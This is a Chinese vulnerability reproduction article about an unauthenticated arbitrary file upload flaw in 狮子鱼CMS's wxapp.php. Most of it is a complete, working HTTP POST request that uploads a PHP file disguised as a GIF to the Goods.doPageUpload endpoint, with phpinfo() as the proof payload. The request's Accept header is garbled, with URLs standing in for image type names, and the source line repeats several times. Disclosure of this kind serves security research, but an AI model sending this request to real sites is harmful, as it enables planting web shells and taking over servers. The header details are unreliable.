漏洞描述
狮子鱼CMS wxapp.php文件 存在任意文件上传漏洞,攻击者在没有身份验证的情况下可以上传恶意文件.
漏洞影响
网络测绘
漏洞复现
登录页面如下
发送请求包上传PHP文件
POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
Host:
Content-Length: 210
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/avif,http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/webp,http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="upfile"; filename="test.php"
Content-Type: image/gif
phpinfo();
------WebKitFormBoundary8UaANmWAgM4BqBSs--
文章来源:http://wiki.peiqi.tech/wiki/cms/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS%20wxapp.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
文章来源:http://wiki.peiqi.tech/wiki/cms/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS%20wxapp.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
文章来源:http://wiki.peiqi.tech/wiki/cms/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS%20wxapp.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
文章来源:http://wiki.peiqi.tech/wiki/cms/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS%20wxapp.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
文章来源:http://wiki.peiqi.tech/wiki/cms/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS%20wxapp.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
原文始发于微信公众号(White OWL):狮子鱼CMS wxapp.php 任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论